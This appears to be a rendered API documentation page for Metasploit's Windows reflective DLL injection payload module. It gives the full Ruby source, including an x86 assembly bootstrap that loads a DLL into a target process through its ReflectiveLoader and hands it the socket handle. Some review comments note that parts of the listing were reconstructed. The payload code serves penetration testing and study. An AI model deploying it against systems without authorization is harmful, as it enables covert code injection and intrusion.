Module: Msf::Payload::Windows::ReflectiveDllInject
- Includes:
- Msf::Payload::Windows, ReflectiveDLLLoader
- Defined in:
- lib/msf/core/payload/windows/reflective_dll_inject.rb
Constant Summary
Constants included from ReflectiveDLLLoader
ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER
Instance Method Summary
- #asm_invoke_dll(opts = {}) ⇒ Object
- #initialize(info = {}) ⇒ Object
- #library_path ⇒ Object
- #stage_payload(opts = {}) ⇒ Object
Methods included from Msf::Payload::Windows
#apply_prepends, exit_types, #handle_intermediate_stage, #include_send_uuid, #replace_var
Methods included from PrependMigrate
#apply_prepend_migrate, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64
Methods included from ReflectiveDLLLoader
#load_rdi_dll, #load_rdi_dll_from_data
Instance Method Details
#asm_invoke_dll(opts = {}) ⇒ Object
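# File 'lib/msf/core/payload/windows/reflective_dll_inject.rb', line 40

# Builds the x86 bootstrap assembly that #stage_payload patches over the
# DLL's DOS header. The stub recovers its own address (call/pop), adds the
# ReflectiveLoader offset and calls it, then calls the DllMain address left
# in eax twice: once with DLL_METASPLOIT_ATTACH (4) and the socket handle
# held in edi, once with DLL_METASPLOIT_DETACH (5) and the exit-function
# value.
#
# @param opts [Hash] :rdi_offset (Integer, required) file offset of the
#   ReflectiveLoader export; :exitfunk (String) key into
#   Msf::Payload::Windows.exit_types
# @return [String] assembly source for Metasm
# @raise [ArgumentError] if :rdi_offset is absent or :exitfunk is not a
#   known exit type
def asm_invoke_dll(opts={})
  # Fail early with a clear message instead of the NoMethodError (nil - 7)
  # or TypeError ("0x%.8x" % nil) that the string formatting would raise.
  rdi_offset = opts.fetch(:rdi_offset) { raise ArgumentError, 'asm_invoke_dll requires opts[:rdi_offset]' }
  exit_type = Msf::Payload::Windows.exit_types[opts[:exitfunk]]
  raise ArgumentError, "unknown exitfunk #{opts[:exitfunk].inspect}" if exit_type.nil?

  # 'pop ebx' captures the address 7 bytes into the stub, so the loader
  # offset is adjusted by that much to be relative to the image start.
  loader_delta = rdi_offset - 7

  %Q^
    ; prologue
      dec ebp               ; 'M'
      pop edx               ; 'Z'
      call $+5              ; call next instruction
      pop ebx               ; get the current location (+7 bytes)
      push edx              ; restore edx
      inc ebp               ; restore ebp
      push ebp              ; save ebp for later
      mov ebp, esp          ; set up a new stack frame
    ; Invoke ReflectiveLoader()
      ; add the offset to ReflectiveLoader() (0x????????)
      add ebx, #{"0x%.8x" % loader_delta}
      call ebx              ; invoke ReflectiveLoader()
    ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
      push edi              ; push the socket handle
      push 4                ; indicate that we have attached
      push eax              ; push some arbitrary value for hInstance
      mov ebx, eax          ; save DllMain for another call
      call ebx              ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
    ; Invoke DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
      ; push the exitfunk value onto the stack
      push #{"0x%.8x" % exit_type}
      push 5                ; indicate that we have detached
      push eax              ; push some arbitrary value for hInstance
      call ebx              ; call DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
  ^
end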
#initialize(info = {}) ⇒ Object
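# File 'lib/msf/core/payload/windows/reflective_dll_inject.rb', line 18

# Declares the stage's metadata and the DLL option that names the local
# reflective DLL to stage.
#
# @param info [Hash] module metadata merged via update_info
def initialize(info = {})
  super(update_info(info,
    'Name'          => 'Reflective DLL Injection',
    'Description'   => 'Inject a DLL via a reflective loader',
    'Author'        => [ 'sf' ],
    'References'    => [
      [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original
      [ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ]        # customisations
    ],
    'Platform'      => 'win',
    'Arch'          => ARCH_X86,
    'PayloadCompat' => { 'Convention' => 'sockedi -https' },
    'Stage'         => { 'Payload' => "" }
  ))

  # NOTE(review): the rendered listing dropped the method name in front of
  # this argument list, leaving an unparseable bare `( [...], self.class )`;
  # register_options is the standard Msf::Module helper for declaring
  # datastore options -- confirm against the source file.
  register_options(
    [
      OptPath.new('DLL', [ true, "The local path to the Reflective DLL to upload" ])
    ], self.class
  )
end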
#library_path ⇒ Object
# File 'lib/msf/core/payload/windows/reflective_dll_inject.rb', line 36

# Path of the DLL to stage, taken from the DLL datastore option.
#
# @return [Object] whatever the datastore holds under 'DLL'
def library_path
  dll_option = datastore['DLL']
  dll_option
end
#stage_payload(opts = {}) ⇒ Object
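# File 'lib/msf/core/payload/windows/reflective_dll_inject.rb', line 70

# Produces the stage: the DLL named by #library_path with the bootstrap
# from #asm_invoke_dll assembled and written over the start of its DOS
# header.
#
# @param opts [Hash] unused; kept for interface compatibility
# @return [String] the DLL buffer returned by load_rdi_dll, patched in place
# @raise [RuntimeError] if the assembled bootstrap would reach e_lfanew
def stage_payload(opts = {})
  # Exceptions will be thrown by the mixin if there are issues.
  dll, offset = load_rdi_dll(library_path)

  asm_opts = {
    rdi_offset: offset,
    exitfunk: 'thread' # default to 'thread' for migration
  }
  asm = asm_invoke_dll(asm_opts)

  # generate the bootstrap asm
  bootstrap = Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string

  # IMAGE_DOS_HEADER.e_lfanew sits at file offset 0x3C (60), so the bootstrap
  # must end before that byte. The previous limit of 62 would have let a
  # 61- or 62-byte stub overwrite the low bytes of e_lfanew.
  e_lfanew_offset = 0x3C
  if bootstrap.length > e_lfanew_offset
    raise RuntimeError, "Reflective DLL Injection (x86) generated an oversized bootstrap!"
  end

  # patch the bootstrap code into the dll's DOS header...
  dll[0, bootstrap.length] = bootstrap
  dll
end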